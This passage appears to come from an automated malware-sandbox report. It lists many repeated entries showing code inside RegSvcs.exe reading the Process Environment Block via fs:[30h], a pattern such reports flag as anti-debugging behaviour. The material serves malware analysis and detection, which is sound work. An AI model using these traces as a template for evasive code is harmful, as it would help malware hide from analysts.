            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015361E5 mov eax, dword ptr fs:[00000030h]4_2_015361E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A0185 mov eax, dword ptr fs:[00000030h]4_2_014A0185
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01504180 mov eax, dword ptr fs:[00000030h]4_2_01504180
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01504180 mov eax, dword ptr fs:[00000030h]4_2_01504180
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E019F mov eax, dword ptr fs:[00000030h]4_2_014E019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E019F mov eax, dword ptr fs:[00000030h]4_2_014E019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E019F mov eax, dword ptr fs:[00000030h]4_2_014E019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E019F mov eax, dword ptr fs:[00000030h]4_2_014E019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0145A197 mov eax, dword ptr fs:[00000030h]4_2_0145A197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0145A197 mov eax, dword ptr fs:[00000030h]4_2_0145A197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0145A197 mov eax, dword ptr fs:[00000030h]4_2_0145A197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0151C188 mov eax, dword ptr fs:[00000030h]4_2_0151C188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0151C188 mov eax, dword ptr fs:[00000030h]4_2_0151C188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01462050 mov eax, dword ptr fs:[00000030h]4_2_01462050
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E6050 mov eax, dword ptr fs:[00000030h]4_2_014E6050
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148C073 mov eax, dword ptr fs:[00000030h]4_2_0148C073
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E4000 mov ecx, dword ptr fs:[00000030h]4_2_014E4000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01502000 mov eax, dword ptr fs:[00000030h]4_2_01502000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01502000 mov eax, dword ptr fs:[00000030h]4_2_01502000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01502000 mov eax, dword ptr fs:[00000030h]4_2_01502000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01502000 mov eax, dword ptr fs:[00000030h]4_2_01502000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01502000 mov eax, dword ptr fs:[00000030h]4_2_01502000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01502000 mov eax, dword ptr fs:[00000030h]4_2_01502000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01502000 mov eax, dword ptr fs:[00000030h]4_2_01502000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01502000 mov eax, dword ptr fs:[00000030h]4_2_01502000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0147E016 mov eax, dword ptr fs:[00000030h]4_2_0147E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0147E016 mov eax, dword ptr fs:[00000030h]4_2_0147E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0147E016 mov eax, dword ptr fs:[00000030h]4_2_0147E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0147E016 mov eax, dword ptr fs:[00000030h]4_2_0147E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0145A020 mov eax, dword ptr fs:[00000030h]4_2_0145A020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0145C020 mov eax, dword ptr fs:[00000030h]4_2_0145C020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014F6030 mov eax, dword ptr fs:[00000030h]4_2_014F6030
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E20DE mov eax, dword ptr fs:[00000030h]4_2_014E20DE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0145A0E3 mov ecx, dword ptr fs:[00000030h]4_2_0145A0E3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E60E0 mov eax, dword ptr fs:[00000030h]4_2_014E60E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014680E9 mov eax, dword ptr fs:[00000030h]4_2_014680E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0145C0F0 mov eax, dword ptr fs:[00000030h]4_2_0145C0F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A20F0 mov ecx, dword ptr fs:[00000030h]4_2_014A20F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0146208A mov eax, dword ptr fs:[00000030h]4_2_0146208A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014580A0 mov eax, dword ptr fs:[00000030h]4_2_014580A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014F80A8 mov eax, dword ptr fs:[00000030h]4_2_014F80A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015260B8 mov eax, dword ptr fs:[00000030h]4_2_015260B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015260B8 mov ecx, dword ptr fs:[00000030h]4_2_015260B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0152A352 mov eax, dword ptr fs:[00000030h]4_2_0152A352
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01508350 mov ecx, dword ptr fs:[00000030h]4_2_01508350
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E2349 mov eax, dword ptr fs:[00000030h]4_2_014E2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E2349 mov eax, dword ptr fs:[00000030h]4_2_014E2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E2349 mov eax, dword ptr fs:[00000030h]4_2_014E2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E2349 mov eax, dword ptr fs:[00000030h]4_2_014E2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E2349 mov eax, dword ptr fs:[00000030h]4_2_014E2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E2349 mov eax, dword ptr fs:[00000030h]4_2_014E2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E2349 mov eax, dword ptr fs:[00000030h]4_2_014E2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E2349 mov eax, dword ptr fs:[00000030h]4_2_014E2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E2349 mov eax, dword ptr fs:[00000030h]4_2_014E2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E2349 mov eax, dword ptr fs:[00000030h]4_2_014E2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E2349 mov eax, dword ptr fs:[00000030h]4_2_014E2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E2349 mov eax, dword ptr fs:[00000030h]4_2_014E2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E2349 mov eax, dword ptr fs:[00000030h]4_2_014E2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E2349 mov eax, dword ptr fs:[00000030h]4_2_014E2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E2349 mov eax, dword ptr fs:[00000030h]4_2_014E2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E035C mov eax, dword ptr fs:[00000030h]4_2_014E035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E035C mov eax, dword ptr fs:[00000030h]4_2_014E035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E035C mov eax, dword ptr fs:[00000030h]4_2_014E035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E035C mov ecx, dword ptr fs:[00000030h]4_2_014E035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E035C mov eax, dword ptr fs:[00000030h]4_2_014E035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E035C mov eax, dword ptr fs:[00000030h]4_2_014E035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0153634F mov eax, dword ptr fs:[00000030h]4_2_0153634F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0150437C mov eax, dword ptr fs:[00000030h]4_2_0150437C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149A30B mov eax, dword ptr fs:[00000030h]4_2_0149A30B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149A30B mov eax, dword ptr fs:[00000030h]4_2_0149A30B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149A30B mov eax, dword ptr fs:[00000030h]4_2_0149A30B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0145C310 mov ecx, dword ptr fs:[00000030h]4_2_0145C310
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01480310 mov ecx, dword ptr fs:[00000030h]4_2_01480310
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01538324 mov eax, dword ptr fs:[00000030h]4_2_01538324
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01538324 mov ecx, dword ptr fs:[00000030h]4_2_01538324
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01538324 mov eax, dword ptr fs:[00000030h]4_2_01538324
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01538324 mov eax, dword ptr fs:[00000030h]4_2_01538324
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015043D4 mov eax, dword ptr fs:[00000030h]4_2_015043D4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015043D4 mov eax, dword ptr fs:[00000030h]4_2_015043D4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014683C0 mov eax, dword ptr fs:[00000030h]4_2_014683C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014683C0 mov eax, dword ptr fs:[00000030h]4_2_014683C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014683C0 mov eax, dword ptr fs:[00000030h]4_2_014683C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014683C0 mov eax, dword ptr fs:[00000030h]4_2_014683C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0146A3C0 mov eax, dword ptr fs:[00000030h]4_2_0146A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0146A3C0 mov eax, dword ptr fs:[00000030h]4_2_0146A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0146A3C0 mov eax, dword ptr fs:[00000030h]4_2_0146A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0146A3C0 mov eax, dword ptr fs:[00000030h]4_2_0146A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0146A3C0 mov eax, dword ptr fs:[00000030h]4_2_0146A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0146A3C0 mov eax, dword ptr fs:[00000030h]4_2_0146A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0150E3DB mov eax, dword ptr fs:[00000030h]4_2_0150E3DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0150E3DB mov eax, dword ptr fs:[00000030h]4_2_0150E3DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0150E3DB mov ecx, dword ptr fs:[00000030h]4_2_0150E3DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0150E3DB mov eax, dword ptr fs:[00000030h]4_2_0150E3DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0151C3CD mov eax, dword ptr fs:[00000030h]4_2_0151C3CD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014703E9 mov eax, dword ptr fs:[00000030h]4_2_014703E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014703E9 mov eax, dword ptr fs:[00000030h]4_2_014703E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014703E9 mov eax, dword ptr fs:[00000030h]4_2_014703E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014703E9 mov eax, dword ptr fs:[00000030h]4_2_014703E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014703E9 mov eax, dword ptr fs:[00000030h]4_2_014703E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014703E9 mov eax, dword ptr fs:[00000030h]4_2_014703E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014703E9 mov eax, dword ptr fs:[00000030h]4_2_014703E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014703E9 mov eax, dword ptr fs:[00000030h]4_2_014703E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014963FF mov eax, dword ptr fs:[00000030h]4_2_014963FF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0147E3F0 mov eax, dword ptr fs:[00000030h]4_2_0147E3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0147E3F0 mov eax, dword ptr fs:[00000030h]4_2_0147E3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0147E3F0 mov eax, dword ptr fs:[00000030h]4_2_0147E3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148438F mov eax, dword ptr fs:[00000030h]4_2_0148438F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148438F mov eax, dword ptr fs:[00000030h]4_2_0148438F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0145E388 mov eax, dword ptr fs:[00000030h]4_2_0145E388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0145E388 mov eax, dword ptr fs:[00000030h]4_2_0145E388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0145E388 mov eax, dword ptr fs:[00000030h]4_2_0145E388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01458397 mov eax, dword ptr fs:[00000030h]4_2_01458397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01458397 mov eax, dword ptr fs:[00000030h]4_2_01458397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01458397 mov eax, dword ptr fs:[00000030h]4_2_01458397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0151A250 mov eax, dword ptr fs:[00000030h]4_2_0151A250
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0151A250 mov eax, dword ptr fs:[00000030h]4_2_0151A250
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E8243 mov eax, dword ptr fs:[00000030h]4_2_014E8243
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E8243 mov ecx, dword ptr fs:[00000030h]4_2_014E8243
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0153625D mov eax, dword ptr fs:[00000030h]4_2_0153625D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0145A250 mov eax, dword ptr fs:[00000030h]4_2_0145A250
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01466259 mov eax, dword ptr fs:[00000030h]4_2_01466259
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01510274 mov eax, dword ptr fs:[00000030h]4_2_01510274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01510274 mov eax, dword ptr fs:[00000030h]4_2_01510274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01510274 mov eax, dword ptr fs:[00000030h]4_2_01510274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01510274 mov eax, dword ptr fs:[00000030h]4_2_01510274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01510274 mov eax, dword ptr fs:[00000030h]4_2_01510274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01510274 mov eax, dword ptr fs:[00000030h]4_2_01510274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01510274 mov eax, dword ptr fs:[00000030h]4_2_01510274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01510274 mov eax, dword ptr fs:[00000030h]4_2_01510274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01510274 mov eax, dword ptr fs:[00000030h]4_2_01510274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01510274 mov eax, dword ptr fs:[00000030h]4_2_01510274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01510274 mov eax, dword ptr fs:[00000030h]4_2_01510274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01510274 mov eax, dword ptr fs:[00000030h]4_2_01510274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01464260 mov eax, dword ptr fs:[00000030h]4_2_01464260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01464260 mov eax, dword ptr fs:[00000030h]4_2_01464260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01464260 mov eax, dword ptr fs:[00000030h]4_2_01464260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0145826B mov eax, dword ptr fs:[00000030h]4_2_0145826B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0145823B mov eax, dword ptr fs:[00000030h]4_2_0145823B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0146A2C3 mov eax, dword ptr fs:[00000030h]4_2_0146A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0146A2C3 mov eax, dword ptr fs:[00000030h]4_2_0146A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0146A2C3 mov eax, dword ptr fs:[00000030h]4_2_0146A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0146A2C3 mov eax, dword ptr fs:[00000030h]4_2_0146A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0146A2C3 mov eax, dword ptr fs:[00000030h]4_2_0146A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015362D6 mov eax, dword ptr fs:[00000030h]4_2_015362D6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014702E1 mov eax, dword ptr fs:[00000030h]4_2_014702E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014702E1 mov eax, dword ptr fs:[00000030h]4_2_014702E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014702E1 mov eax, dword ptr fs:[00000030h]4_2_014702E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E0283 mov eax, dword ptr fs:[00000030h]4_2_014E0283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E0283 mov eax, dword ptr fs:[00000030h]4_2_014E0283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E0283 mov eax, dword ptr fs:[00000030h]4_2_014E0283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149E284 mov eax, dword ptr fs:[00000030h]4_2_0149E284
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149E284 mov eax, dword ptr fs:[00000030h]4_2_0149E284
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014702A0 mov eax, dword ptr fs:[00000030h]4_2_014702A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014702A0 mov eax, dword ptr fs:[00000030h]4_2_014702A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014F62A0 mov eax, dword ptr fs:[00000030h]4_2_014F62A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014F62A0 mov ecx, dword ptr fs:[00000030h]4_2_014F62A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014F62A0 mov eax, dword ptr fs:[00000030h]4_2_014F62A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014F62A0 mov eax, dword ptr fs:[00000030h]4_2_014F62A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014F62A0 mov eax, dword ptr fs:[00000030h]4_2_014F62A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014F62A0 mov eax, dword ptr fs:[00000030h]4_2_014F62A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01468550 mov eax, dword ptr fs:[00000030h]4_2_01468550
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01468550 mov eax, dword ptr fs:[00000030h]4_2_01468550
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149656A mov eax, dword ptr fs:[00000030h]4_2_0149656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149656A mov eax, dword ptr fs:[00000030h]4_2_0149656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149656A mov eax, dword ptr fs:[00000030h]4_2_0149656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014F6500 mov eax, dword ptr fs:[00000030h]4_2_014F6500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01534500 mov eax, dword ptr fs:[00000030h]4_2_01534500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01534500 mov eax, dword ptr fs:[00000030h]4_2_01534500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01534500 mov eax, dword ptr fs:[00000030h]4_2_01534500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01534500 mov eax, dword ptr fs:[00000030h]4_2_01534500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01534500 mov eax, dword ptr fs:[00000030h]4_2_01534500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01534500 mov eax, dword ptr fs:[00000030h]4_2_01534500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01534500 mov eax, dword ptr fs:[00000030h]4_2_01534500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01470535 mov eax, dword ptr fs:[00000030h]4_2_01470535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01470535 mov eax, dword ptr fs:[00000030h]4_2_01470535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01470535 mov eax, dword ptr fs:[00000030h]4_2_01470535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01470535 mov eax, dword ptr fs:[00000030h]4_2_01470535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01470535 mov eax, dword ptr fs:[00000030h]4_2_01470535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01470535 mov eax, dword ptr fs:[00000030h]4_2_01470535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148E53E mov eax, dword ptr fs:[00000030h]4_2_0148E53E
